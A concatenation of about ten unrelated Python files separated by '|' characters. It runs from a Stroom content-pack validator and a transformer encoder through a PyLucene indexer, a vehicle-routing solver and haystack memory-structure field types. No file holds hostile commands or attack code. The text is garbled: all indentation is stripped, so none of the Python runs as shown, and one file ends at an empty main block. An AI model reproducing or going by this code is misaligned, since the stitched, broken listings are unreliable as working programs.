# Determine if this pack is in v6+ format or not by the presence
# of any .node files
is_stroom_six_or_above = False
for root, dirnames, filenames in os.walk(pack_dir):
if not is_stroom_six_or_above:
for filename in filenames:
if not is_stroom_six_or_above and filename.endswith('.node'):
is_stroom_six_or_above = True
break
return is_stroom_six_or_above
def check_if_uuid_already_used(doc_ref, uuid_to_doc_ref_dict, full_filename):
if doc_ref.uuid in uuid_to_doc_ref_dict:
existing_doc_ref = uuid_to_doc_ref_dict.get(doc_ref.uuid)
error_exit(("Entity {} with type {} has a duplicate UUID {}. "
+ "Duplicate of entity {} with type {}").format(
Col.blue(full_filename),
Col.cyan(doc_ref.entity_type),
Col.yellow(doc_ref.uuid),
Col.green(existing_doc_ref.name),
Col.cyan(existing_doc_ref.entity_type)))
else:
# Add our unique uuid/doc_ref to the dict
uuid_to_doc_ref_dict[doc_ref.uuid] = doc_ref
def extract_entity_uuids_from_xml(pack_dir, uuid_to_doc_ref_dict, node_tree):
for root, dirnames, filenames in os.walk(pack_dir):
for xml_file in fnmatch.filter(filenames, '*.xml'):
if not xml_file.endswith(".data.xml"):
logging.debug("root: {}".format(root))
logging.debug("xml_file: {}".format(xml_file))
full_filename = os.path.join(root, xml_file)
doc_ref = extract_doc_ref_from_xml(full_filename)
logging.debug("doc_ref: {}".format(doc_ref))
if doc_ref.entity_type != "folder":
# this is a stroom entity, not a folder
entity_path = os.path.relpath(
root, pack_dir)
logging.debug("entity_path: {}".format(entity_path))
node = Node(entity_path, doc_ref)
# Add the found node to our tree, which will ensure the
# entity name is unique within its path
node_tree.add_node(node)
if doc_ref.entity_type != FOLDER_ENTITY_TYPE:
check_if_uuid_already_used(
doc_ref,
uuid_to_doc_ref_dict,
full_filename)
def extract_entity_uuids_from_node_files(
pack_dir, uuid_to_doc_ref_dict, node_tree):
for root, dirnames, filenames in os.walk(pack_dir):
for node_file in fnmatch.filter(filenames, '*.node'):
logging.debug("node_file: {}".format(node_file))
full_filename = os.path.join(root, node_file)
logging.debug("full_filename: {}".format(full_filename))
node = extract_node_from_node_file(full_filename)
# Add the found node to our tree, which will ensure the
# entity name is unique within its path
node_tree.add_node(node)
check_if_uuid_already_used(
node.doc_ref,
uuid_to_doc_ref_dict,
full_filename)
def validate_pack(
pack, root_path, path_to_uuid_dict, uuid_to_doc_ref_dict, node_tree):
# validation rules:
# All folder entities (pre-v6 only) must have a uniqe UUID
# All entities must have a unique UUID
# All entities must have a unique (name, type) within a folder
# All node files must have a filename that matches a specific format
pack_path = os.path.join(root_path, pack)
#check the folder exists for the pack name
if not os.path.isdir(pack_path):
error_exit("Pack {} does not exist in {}".format(pack, root_path))
stroom_content_path = os.path.join(pack_path, STROOM_CONTENT_DIR_NAME)
# Determine if this pack is in v6+ format or not by the presence
# of any .node files
is_stroom_six_or_above = is_pack_stroom_six_or_greater(stroom_content_path)
preV6Str = "" if is_stroom_six_or_above else "(pre-v6)"
print("Validating pack {} {}".format(
Col.green(pack),
Col.red(preV6Str)))
if not is_stroom_six_or_above:
validate_pre_stroom_six_folder_uuids(
stroom_content_path,
path_to_uuid_dict)
#Loop through all the xml files finding those that have a uuid element
#for each one that isn't a folder entity make sure the uuid
#is not already used by another entity
if is_stroom_six_or_above:
extract_entity_uuids_from_node_files(
stroom_content_path,
uuid_to_doc_ref_dict,
node_tree)
else:
extract_entity_uuids_from_xml(
stroom_content_path,
uuid_to_doc_ref_dict,
node_tree)
def validate_packs(pack_list, root_path):
# logging.debug("Validating packs: {}".format(pack_list))
# A dict of path=>uuid mappings to establish if we have multiple folder
# paths with the same uuid (pre stroom6 only)
path_to_uuid_dict = dict()
# A dict of uuid=>docref
uuid_to_doc_ref_dict = dict()
# Create the root node of the folder/entity tree
node_tree = Folder.create_root_folder()
print("\nValidating content packs")
for pack in pack_list:
validate_pack(
pack,
root_path,
path_to_uuid_dict,
uuid_to_doc_ref_dict,
node_tree)
print("\nUUIDs for pre-v6 paths:")
for key in sorted(path_to_uuid_dict):
print("{} - {}".format(
Col.bold_blue(key),
Col.dark_grey(path_to_uuid_dict[key])))
print("\nDisplaying the complete explorer tree for the chosen packs\n")
node_tree.print_tree()
print("\nValidation completed with no errors")
# Script proper starts here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if len(sys.argv) == 1:
print_error("No arguments supplied")
print_usage()
exit(1)
isAllPacks = False
packs_to_build = []
for arg in sys.argv[1:]:
if arg == "--all":
isAllPacks = True
else:
packs_to_build.append(arg)
if len(packs_to_build) > 0 and isAllPacks:
print_error("Cannot specify --all and named packs")
print_usage()
exit(1)
if len(packs_to_build) == 0 and not isAllPacks:
print_error("Must specify --all or provide a list of named packs")
print_usage()
exit(1)
if isAllPacks:
print("Processing all content packs")
for list_entry in os.listdir(source_path):
if os.path.isdir(os.path.join(source_path, list_entry)):
packs_to_build.append(list_entry)
else:
print("Processing packs: {}".format(packs_to_build))
print("Using root path: {}".format(Col.blue(root_path)))
print("Using source path: {}".format(Col.blue(source_path)))
validate_packs(packs_to_build, source_path)
print("Done!")
exit(0)
|
a = list(range(10))
step = 30;
def setup ():
size (500 , 500)
smooth ()
noStroke ()
myInit ()
def myInit ():
global a
for i in range(len(a)):
a[i]=list(range(int(random (0, 10))))
for j in range(len(a[i])):
a[i][j] = int(random (0, 30))
def draw ():
global a, step
fill (180 , 50)
background (10)
for i in range(len(a)):
for j in range(len(a[i])):
stroke (100)
strokeWeight (1)
fill (50)
rect (i* step + 100 , j* step + 100 , step , step )
noStroke ()
fill (250 , 90)
ellipse (i* step +115 , j* step +115 , a[i][j], a[i][j])
|
# Copyright: http://nlp.seas.harvard.edu/2018/04/03/attention.html
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import math, copy, time
from torch.autograd import Variable
import seaborn
seaborn.set_context(context="talk")
# ENCODER: CLONE
def clones(module, N):
"Produce N identical layers."
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
# ENCODER
class Encoder(nn.Module):
"Core encoder is a stack of N layers"
def __init__(self, layer, N):
super(Encoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, mask=None):
"Pass the input (and mask) through each layer in turn."
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
# ATTENTION #
def attention(query, key, value, mask=None, dropout=None):
"Compute 'Scaled Dot Product Attention'"
d_k = query.size(-1)
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim = -1)
if dropout is not None:
p_attn = dropout(p_attn)
return torch.matmul(p_attn, value), p_attn # means x and self_attention in MultiHeadedAttention in # 2) Apply attention on all the projected vectors in batch.
# MULTI-HEAD ATTENTION
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
"Implements Figure 2"
if mask is not None:
# Same mask applied to all h heads.
mask = mask.unsqueeze(1)
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)
return self.linears[-1](x)
# LAYER NORM
class LayerNorm(nn.Module):
"Construct a layernorm module (See citation for details)."
def __init__(self, features, eps=1e-6):
super(LayerNorm, self).__init__()
self.a_2 = nn.Parameter(torch.ones(features))
self.b_2 = nn.Parameter(torch.zeros(features))
self.eps = eps
def forward(self, x):
mean = x.mean(-1, keepdim=True)
std = x.std(-1, keepdim=True)
return self.a_2 * (x - mean) / (std + self.eps) + self.b_2
# SUBLAYER CONNECTION (Residual connection)
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
# POSSITION FEED-FORWARD
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, dropout=0.1): #d_ff,
super(PositionwiseFeedForward, self).__init__()
#self.w_1 = nn.Linear(d_model, int(d_model/2))
#self.w_2 = nn.Linear(int(d_model/2), d_model)
self.w = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.dropout(F.relu(self.w(x))) # self.w_2(self.dropout(F.relu(self.w_1(x))))
# ENCODER LAYER
class EncoderLayer(nn.Module):
"Encoder is made up of self-attn and feed forward (defined below)"
def __init__(self, size, self_attn, feed_forward, dropout):
super(EncoderLayer, self).__init__()
self.self_attn = self_attn
self.feed_forward = feed_forward
self.sublayer = clones(SublayerConnection(size, dropout), 2)
self.size = size
def forward(self, x, mask):
"Follow Figure 1 (left) for connections."
x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))
return self.sublayer[1](x, self.feed_forward)
# INPUT: EMBEDDING AND SOFTMAX
class Embeddings(nn.Module): # source
def __init__(self, numdims, d_model): # , numdims1, numdims2): # numdims can be number of dimensions of scr
super(Embeddings, self).__init__()
self.lut = nn.Linear(numdims, d_model)
self.d_model = d_model
self.dropout = nn.Dropout()
def forward(self, x):
x = x.float()
return self.lut(x) * math.sqrt(self.d_model)
# BASE: ENCODER and a FULLY CONNECTED LAYER
class Encoder_FullyConnected(nn.Module):
"""
A standard Encoder-Decoder architecture. Base for this and many
other models.
"""
def __init__(self, inputdim1, inputdim2, inputdim3, inputdim4, inputdim5, src_embed, encoder, d_model= 8):
super(Encoder_FullyConnected, self).__init__()
print('dims: ', inputdim1, inputdim2, inputdim3, inputdim4, inputdim5)
self.linear1 = nn.Linear(inputdim1, d_model)
self.linear2 = nn.Linear(inputdim2, d_model)
self.linear3 = nn.Linear(inputdim3, d_model)
self.linear4 = nn.Linear(inputdim4, d_model)
self.linear5 = nn.Linear(inputdim5, d_model)
self.src_embed = src_embed
self.encoder = encoder
self.linear = nn.Linear(d_model, 1)
self.pooling = nn.AvgPool1d(5) # pooling window = 5
self.drop = nn.Dropout(0.1)
def forward(self, src1, src2, src3, src4, src5):
"Take in and process masked src and target sequences."
reduced1 = self.linear1(src1)
reduced2 = self.linear2(src2)
reduced3 = self.linear3(src3)
reduced4 = self.linear4(src4)
reduced5 = self.linear5(src5)
src = torch.cat((reduced1, reduced2, reduced3, reduced4, reduced5), dim=1)
temp = self.encoder(src) # shape: batchsize x 5 x d_model
temp_permute = temp.permute(0, 2, 1) # shape: batchsize x d_model x 5
temp2 = self.pooling(temp_permute) # shape: batchsize x d_model x 1
temp3 = self.linear(self.drop(temp2.squeeze(-1)))
return temp3
# FULL MODEL
def make_model(input_dim_1, input_dim_2, input_dim_3, input_dim_4, input_dim_5, N=6, d_model=8, h=8, dropout=0.5):
c = copy.deepcopy
attn = MultiHeadedAttention(h, d_model)
ff = PositionwiseFeedForward(d_model, dropout)
embedding = Embeddings(d_model, d_model)
model = Encoder_FullyConnected(input_dim_1, input_dim_2, input_dim_3, input_dim_4, input_dim_5, nn.Sequential(embedding), Encoder(EncoderLayer(d_model, c(attn), c(ff), dropout), N), d_model)
return model
|
# 各行を3コラム目の数値の逆順で整列せよ
# (注意: 各行の内容は変更せずに並び替えよ).
# 確認にはsortコマンドを用いよ(この問題はコマンドで実行した時の結果と合わなくてもよい)
# 確認コマンド
# * sort -r -k 3 popular-names.txt
# * diff <(sort -r -k 3 popular-names.txt) <(python 2_18.py) ※ bashで
columns_tuple_list = []
with open('popular-names.txt') as f:
for line in f.readlines():
columns = line.split('\t')
columns_tuple_list.append((columns[2], line))
sorted_columns = sorted(
columns_tuple_list, key=lambda x: x[0], reverse=True)
for _, c in sorted_columns:
print(c, end='')
|
# -*- coding: utf-8 -*-
#
# Copyright 2008 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
#
"""
interface for the pylucene (v1.x) indexing engine
take a look at PyLuceneIndexer.py for PyLucene v2.x support
"""
# this module is based on PyLuceneIndexer (for PyLucene v2.x)
import PyLuceneIndexer
import PyLucene
def is_available():
return PyLuceneIndexer._get_pylucene_version() == 1
class PyLuceneDatabase(PyLuceneIndexer.PyLuceneDatabase):
"""manage and use a pylucene indexing database"""
def _create_query_for_string(self, text, require_all=True,
analyzer=None):
"""generate a query for a plain term of a string query
basically this function parses the string and returns the resulting
query
:param text: The query string
:type text: str
:param require_all: boolean operator
(True -> AND (default) / False -> OR)
:type require_all: bool
:param analyzer: The analyzer to be used
Possible analyzers are:
- :attr:`CommonDatabase.ANALYZER_TOKENIZE`
the field value is splitted to be matched word-wise
- :attr:`CommonDatabase.ANALYZER_PARTIAL`
the field value must start with the query string
- :attr:`CommonDatabase.ANALYZER_EXACT`
keep special characters and the like
:type analyzer: bool
:return: resulting query object
:rtype: PyLucene.Query
"""
if analyzer is None:
analyzer = self.analyzer
if analyzer == self.ANALYZER_EXACT:
# exact matching - no substitution ...
# for PyLucene: nothing special is necessary
pass
# don't care about special characters ...
if analyzer == self.ANALYZER_EXACT:
analyzer_obj = self.ExactAnalyzer()
else:
text = _escape_term_value(text)
analyzer_obj = PyLucene.StandardAnalyzer()
qp = PyLucene.QueryParser(analyzer=analyzer_obj)
if require_all:
qp.setDefaultOperator(qp.Operator.AND)
else:
qp.setDefaultOperator(qp.Operator.OR)
if (analyzer & self.ANALYZER_PARTIAL) > 0:
# PyLucene uses explicit wildcards for partial matching
text += "*"
return qp.parse(text)
def _create_query_for_field(self, field, value, analyzer=None):
"""Generate a field query.
This functions creates a field->value query.
:param field: The fieldname to be used
:type field: str
:param value: The wanted value of the field
:type value: str
:param analyzer: The analyzer to be used
Possible analyzers are:
- :attr:`CommonDatabase.ANALYZER_TOKENIZE`
the field value is splitted to be matched word-wise
- :attr:`CommonDatabase.ANALYZER_PARTIAL`
the field value must start with the query string
- :attr:`CommonDatabase.ANALYZER_EXACT`
keep special characters and the like
:type analyzer: bool
:return: Resulting query object
:rtype: PyLucene.Query
"""
if analyzer is None:
analyzer = self.analyzer
if analyzer == self.ANALYZER_EXACT:
analyzer_obj = self.ExactAnalyzer()
else:
value = _escape_term_value(value)
analyzer_obj = PyLucene.StandardAnalyzer()
if (analyzer & self.ANALYZER_PARTIAL) > 0:
# PyLucene uses explicit wildcards for partial matching
value += "*"
return PyLucene.QueryParser.parse(value, field, analyzer_obj)
def _create_query_combined(self, queries, require_all=True):
"""generate a combined query
:param queries: list of the original queries
:type queries: list of xapian.Query
:param require_all: boolean operator
(True -> AND (default) / False -> OR)
:type require_all: bool
:return: the resulting combined query object
:rtype: PyLucene.Query
"""
combined_query = PyLucene.BooleanQuery()
for query in queries:
combined_query.add(
PyLucene.BooleanClause(query, require_all, False))
return combined_query
def _add_plain_term(self, document, term, tokenize=True):
"""add a term to a document
:param document: the document to be changed
:type document: xapian.Document | PyLucene.Document
:param term: a single term to be added
:type term: str
:param tokenize: should the term be tokenized automatically
:type tokenize: bool
"""
# Field parameters: name, string, store, index, token
document.add(PyLucene.Field(str(PyLuceneIndex.UNNAMED_FIELD_NAME), term,
True, True, tokenize))
def _add_field_term(self, document, field, term, tokenize=True):
"""add a field term to a document
:param document: the document to be changed
:type document: xapian.Document | PyLucene.Document
:param field: name of the field
:type field: str
:param term: term to be associated to the field
:type term: str
:param tokenize: should the term be tokenized automatically
:type tokenize: bool
"""
# TODO: decoding (utf-8) is missing
# Field parameters: name, string, store, index, token
document.add(PyLucene.Field(str(field), term,
True, True, tokenize))
def get_query_result(self, query):
"""return an object containing the results of a query
:param query: a pre-compiled query
:type query: a query object of the real implementation
:return: an object that allows access to the results
:rtype: subclass of CommonEnquire
"""
return PyLucene.indexSearcher.search(query)
def search(self, query, fieldnames):
"""return a list of the contents of specified fields for all matches of
a query
:param query: the query to be issued
:type query: a query object of the real implementation
:param fieldnames: the name(s) of a field of the document content
:type fieldnames: string | list of strings
:return: a list of dicts containing the specified field(s)
:rtype: list of dicts
"""
if isinstance(fieldnames, basestring):
fieldnames = [fieldnames]
hits = PyLucene.indexSearcher.search(query)
result = []
for hit, doc in hits:
fields = {}
for fieldname in fieldnames:
content = doc.get(fieldname)
if not content is None:
fields[fieldname] = content
result.append(fields)
return result
def _writer_open(self):
"""open write access for the indexing database and acquire an
exclusive lock
"""
super(PyLuceneIndexer1, self)._writer_open_()
self.writer.maxFieldLength = PyLuceneIndexer.MAX_FIELD_SIZE
|
from path import args
sys.path.insert(0,str(args.root_path))
from options import opt
from pathlib import Path
import os
import cv2
def strip_txt_file(txt_file, cam_dict):
_file = open(txt_file,'r')
lines = _file.readlines()
for line in lines:
line = line.strip()
ele = line.split(' ',1)
cam_dict[ele[0]]=int(ele[1])
return cam_dict
def read_cam_frame(train_S_list, valid_S_list, test_S_list):
cam_framenum = Path(opt.raw_data_path).joinpath('cam_framenum')
train_cam_framenum = {}
valid_cam_framenum={}
test_cam_framenum={}
for S_txt in os.listdir(cam_framenum):
S_txt_path = cam_framenum.joinpath(S_txt)
if S_txt[:-4] in train_S_list:
train_cam_framenum = strip_txt_file(S_txt_path, train_cam_framenum)
elif S_txt[:-4] in valid_S_list:
valid_cam_framenum = strip_txt_file(S_txt_path, valid_cam_framenum)
elif S_txt[:-4] in test_S_list:
test_cam_framenum = strip_txt_file(S_txt_path, test_cam_framenum)
return train_cam_framenum, valid_cam_framenum, test_cam_framenum
def gen_frame(_folder):
print(_folder + " start")
frame_dir = Path(opt.data_root).joinpath('frames').joinpath(_folder+'_frame')
if _folder == 'valid':
_folder = 'validation'
for S_folder in Path(opt.raw_data_path).joinpath(_folder).glob('*'):
for camid in os.listdir(S_folder):
cam_vid = S_folder.joinpath(camid).joinpath('vdo.avi')
cap = cv2.VideoCapture(str(cam_vid))
success,image = cap.read()
cnt = 0
while success:
frame_name = camid + '_' + str(cnt).zfill(4)
img_path = Path(frame_dir).joinpath(frame_name+'.jpg')
cv2.imwrite(str(img_path),image)
success,image = cap.read()
cnt += 1
print(camid + ' finished')
print(_folder + " complete\n")
if __name__ == '__main__':
train_S_list = ['S01', 'S03', 'S04', 'S05']
valid_S_list = ['S02']
test_S_list = ['S06']
train_cam_framenum, valid_cam_framenum, test_cam_framenum = read_cam_frame(train_S_list, valid_S_list, test_S_list)
gen_frame('train')
gen_frame('valid')
gen_frame('test')
# gt: [frame, ID, left, top, width, height, 1, -1, -1, -1]
|
def count_substring(s, sub_string):
count = 0
l = len(sub_string)
for i in range(len(s)-l+1):
if s[i:i+l]==sub_string:
count+=1
return count
if __name__ == '__main__':
|
import os
print(list(range(0, 11)))
print([x * x for x in range(1, 11)])
print([x * x for x in range(1, 11) if x % 2 == 0])
print([m + n for m in 'ABC' for n in 'XYZ'])
print([d for d in os.listdir('.')])
d = {'x': 'A', 'y': 'B', 'z': 'C' }
for k, v in d.items():
print(k, '=', v)
print([k + '=' + v for k, v in d.items()])
L = ['Hello', 'World', 'IBM', 'Apple']
print([s.lower() for s in L])
|
# from data.text2json2 import BASE_DIR
import numpy as np
import json
import io
import matplotlib.pyplot as plt
import random
class Solomon:
"""This class encapsulates the VRPTW problem
"""
def __init__(self, problemName, number=1000):
"""
Creates an instance of a Solomon problem
:param name: name of the problem
"""
# initialize instance variables:
self.name = problemName
self.locations = []
self.distances = []
self.number = number
self.capacity = 0
self.LATE_PENALTY = 100 # per unit
self.LOAD_PENALTY = 1000 # per unit
self.sequenced = {}
self.metaChromosome = []
# initialize the data:
self.__initData()
def __len__(self):
"""
returns the length of the underlying TSP
:return: the length of the underlying TSP (number of cities)
"""
return len(self.locations)
def __initData(self):
DATA_DIR = "./data/json/"
# attempt to read json data:
obj = None
with io.open(DATA_DIR + self.name + ".json", 'rt', newline='') as file_object:
obj = json.load(file_object)
if obj != None and self.name == obj['name']:
self.locations = obj['locs']
self.distances = obj['dist']
self.number = min(obj['number'], self.number)
self.capacity = obj['capacity']
# print(obj["name"], locs[0], locs[99], dist[0][99])
def plotData(self, solution=[], centroids=[], label=False):
"""plots the path described by the given indices of the cities
:param indices: A list of ordered city indices describing the given path.
:return: the resulting plot
"""
plt.figure(0)
np.random.seed(42)
x = [l['x'] for l in self.locations]
y = [l['y'] for l in self.locations]
colors = np.random.rand(len(self.locations))
# colors[0] = 10.0
area = [10 + (l['demand'] * 2) for l in self.locations]
plt.scatter(x, y, s=area, c=colors, alpha=0.7)
plt.scatter([x[0]], [y[0]], marker="s") # show the depot as a square
if label:
for i, (xi, yi) in enumerate(zip(x, y)):
plt.annotate(str(i), (xi, yi))
plt.title(self.calcScore(solution))
for truck in solution:
if truck[0] != 0:
truck.insert(0, 0)
if truck[-1] != 0:
truck.append(0)
xs = [self.locations[i]['x'] for i in truck]
ys = [self.locations[i]['y'] for i in truck]
# plot a line between each pair of consecutive cities:
plt.plot(xs, ys)
if len(centroids) > 0:
plt.scatter(centroids[:, 0], centroids[:, 1],
marker="+") # the centroid as a +
plt.show()
return plt
def calcTruckScore(self, truck):
p = 0
time = 0
load = 0
total_penalty = 0
total_dist = 0
for q in truck + [0]:
dist = self.distances[p][q]
total_dist += dist
time += dist
load += self.locations[q]['demand']
late = time - self.locations[q]['end']
if late > 0:
# print(f"late by {late} between {p} and {q}")
total_penalty += self.LATE_PENALTY * late
if time < self.locations[q]['start']:
time = self.locations[q]['start']
time = time + self.locations[q]['service']
p = q
# print("time:", q, time)
if load > self.capacity:
total_penalty += self.LOAD_PENALTY * (load - self.capacity)
return total_dist + total_penalty
def calcScore(self, trucks: list, penalize=False):
return sum([self.calcTruckScore(t) for t in trucks])
def findClusters(self):
from sklearn.cluster import KMeans
# import numpy as np
points = [[float(l['x']), float(l['y'])] for l in self.locations[1:]]
kmeans = KMeans(n_clusters=self.number, random_state=0).fit(points)
labels = kmeans.labels_
# clusters = kmeans.cluster_centers_
# self.plotData(centroids=clusters)
return labels
def findNeighbours(self, truck, trucks, D, N):
outerpoints = set(range(len(self.locations))) - set(truck)
# [p for p in range(len(self.locations)) if p not in truck]
neighbours = {}
for c in truck:
if c == 0:
continue
cx, cy = self.locations[c]['x'], self.locations[c]['y']
# fast distance check:
for d in outerpoints:
if d == 0:
continue
dx, dy = self.locations[d]['x'], self.locations[d]['y']
if np.absolute(dx - cx) <= D or np.absolute(dy - cy) <= D:
nbr = 0
for j, t in enumerate(trucks):
if d in t:
nbr = j
break
neighbours[nbr] = neighbours.get(nbr, 0) + 1
# nrs = random.choices(list(neighbours.keys()), weights=list(neighbours.values()), k=N)
nrs = []
if len(neighbours) < N:
nrs = list(neighbours.keys())
else:
nrs = random.sample(list(neighbours.keys()), k=N)
return nrs
def findAnchor(self, trucks: list):
scores = [(i, self.calcTruckScore(t)) for i, t in enumerate(trucks)]
scores.sort(key=lambda x: x[1], reverse=True)
w = random.sample(scores[:3], k=1)
return w[0][0]
# ---- random anchor selection
# worsttruck = random.sample(range(len(trucks)), k=1)
# return worsttruck[0]
def getChromosomeFromSolution(self, trucks):
self.metaChromosome = [-1] * len(self.locations)
for i, truck in enumerate(trucks):
for l in truck:
self.metaChromosome[l] = i
ret = [i for i in self.metaChromosome if i > -1]
return ret
def getSolutionFromChromosome(self, chromosome):
if self.metaChromosome == [] or len(chromosome) + 1 == len(self):
self.metaChromosome = [-1] + list(chromosome)
trucks = {}
locations = [i for i, t in enumerate(
self.metaChromosome) if t > -1]
# print("getSolutionFromChromosome", locations)
for i, t in enumerate(chromosome):
if t not in trucks:
trucks[t] = []
trucks[t].append(locations[i])
return trucks.values()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Loic Jaquemet loic.jaquemet+python@gmail.com
#
import logging
import ctypes
from haystack.reverse import config
from haystack.reverse import structure
"""
the Python classes to represent the guesswork record and field typing of
allocations.
"""
log = logging.getLogger('field')
# Field related functions and classes
class FieldType(object):
"""
Represents the type of a field.
"""
types = set()
def __init__(self, _id, _name, _signature):
self.__id = _id
self.__name = _name
self.__sig = _signature
@property
def id(self):
return self.__id
@property
def name(self):
return self.__name
@property
def signature(self):
return self.__sig
def __cmp__(self, other):
try:
return cmp(self.id, other.id)
except AttributeError as e:
return -1
def __hash__(self):
return hash(self.id)
def __str__(self):
return '<FieldType %s>' % self.name
def __repr__(self):
return '<t:%s>' % self.name
class FieldTypeStruct(FieldType):
"""
Fields that are know independent structure.
In case we reverse a Big record that has members of known record types.
"""
def __init__(self, _typename):
assert isinstance(_typename, str)
super(FieldTypeStruct, self).__init__(0x1, _typename, 'K')
def __str__(self):
return self.name
class FieldTypeArray(FieldType):
"""
An array type
"""
def __init__(self, item_type, item_size, nb_items):
super(FieldTypeArray, self).__init__(0x60, '%s*%d' % (item_type.name, nb_items), 'a')
self.nb_items = nb_items
self.item_type = item_type
self.item_size = item_size
self.size = item_size*nb_items
class RecordTypePointer(FieldType):
def __init__(self, _type):
#if typ == STRING:
# return STRING_POINTER
super(RecordTypePointer, self).__init__(_type.id + 0xa, 'ctypes.POINTER(%s)' % _type.name, 'P')
# setup all the know types that are interesting to us
UNKNOWN = FieldType(0x0, 'ctypes.c_ubyte', 'u')
STRUCT = FieldType(0x1, 'Structure', 'K')
ZEROES = FieldType(0x2, 'ctypes.c_ubyte', 'z')
STRING = FieldType(0x4, 'ctypes.c_char', 'T')
STRING16 = FieldType(0x14, 'ctypes.c_char', 'T')
STRINGNULL = FieldType(0x6, 'ctypes.c_char', 'T')
STRING_POINTER = FieldType(0x4 + 0xa, 'ctypes.c_char_p', 's')
INTEGER = FieldType(0x18, 'ctypes.c_uint', 'I')
SMALLINT = FieldType(0x8, 'ctypes.c_uint', 'i')
SIGNED_SMALLINT = FieldType(0x28, 'ctypes.c_int', 'i')
ARRAY = FieldType(0x40, 'Array', 'a')
BYTEARRAY = FieldType(0x50, 'ctypes.c_ubyte', 'a')
# ARRAY_CHAR_P = FieldType(0x9, 'array_char_p', 'ctypes.c_char_p', 'Sp')
POINTER = FieldType(0xa, 'ctypes.c_void_p', 'P')
PADDING = FieldType(0xff, 'ctypes.c_ubyte', 'X')
class Field(object):
"""
Class that represent a Field instance, a FieldType instance.
"""
def __init__(self, name, offset, _type, size, is_padding):
self.__name = name
self.__offset = offset
assert isinstance(_type, FieldType)
self.__field_type = _type
self.__size = size
self.__padding = is_padding
self.__comment = '#'
@property
def name(self):
return self.__name
@name.setter
def name(self, _name):
if _name is None:
self.__name = '%s_%s' % (self.field_type.name, self.offset)
else:
self.__name = _name
@property
def offset(self):
return self.__offset
@property
def field_type(self):
return self.__field_type
@property
def size(self):
return self.__size
@property
def padding(self):
return self.__padding
@property
def comment(self):
return self.__comment
@comment.setter
def comment(self, txt):
self.__comment = '# %s' % txt
def is_string(self): # null terminated
return self.field_type in [STRING, STRING16, STRINGNULL, STRING_POINTER]
def is_pointer(self):
# we could be a pointer or a pointer string
return issubclass(self.__class__, PointerField)
def is_zeroes(self):
return self.field_type == ZEROES
def is_array(self): # will be overloaded
return self.field_type == ARRAY or self.field_type == BYTEARRAY
def is_integer(self):
return self.field_type == INTEGER or self.field_type == SMALLINT or self.field_type == SIGNED_SMALLINT
def is_record(self):
return self.field_type == STRUCT
def is_gap(self):
return self.field_type == UNKNOWN
def get_typename(self):
if self.is_string() or self.is_zeroes():
return '%s*%d' % (self.field_type.name, len(self))
elif self.is_array():
# TODO should be in type
return '%s*%d' % (self.field_type.name, len(self) / self.nb_items)
elif self.field_type == UNKNOWN:
return '%s*%d' % (self.field_type.name, len(self))
return self.field_type.name
def __hash__(self):
return hash((self.offset, self.size, self.field_type))
def __cmp__(self, other):
# XXX : Perf... cmp sux
try:
if self.offset < other.offset:
return -1
elif self.offset > other.offset:
return 1
elif (self.offset, self.size, self.field_type) == (other.offset, other.size, other.field_type):
return 0
# last chance, expensive cmp
return cmp((self.offset, self.size, self.field_type),
(other.offset, other.size, other.field_type))
except AttributeError as e:
# if not isinstance(other, Field):
return -1
def __len__(self):
return int(self.size) # some long come and goes
def __repr__(self):
return str(self)
def __str__(self):
return '<Field offset:%d size:%s t:%s>' % (self.offset, self.size, self.field_type)
def get_signature(self):
return self.field_type, self.size
def to_string(self, value):
if value is None:
value = 0
if self.is_pointer():
comment = '# @ 0x%0.8x %s' % (value, self.comment)
elif self.is_integer():
comment = '# 0x%x %s' % (value, self.comment)
elif self.is_zeroes():
comment = '''# %s zeroes: '\\x00'*%d''' % (self.comment, len(self))
elif self.is_string():
comment = '# %s %s: %s' % (self.comment, self.field_type.name, value)
elif self.is_record():
comment = '#'
else:
# unknown
comment = '# %s else bytes:%s' % (self.comment, repr(value))
# prep the string
fstr = "( '%s' , %s ), %s\n" % (self.name, self.get_typename(), comment)
return fstr
class PointerField(Field):
"""
represent a pointer field
"""
def __init__(self, name, offset, size):
super(PointerField, self).__init__(name, offset, POINTER, size, False)
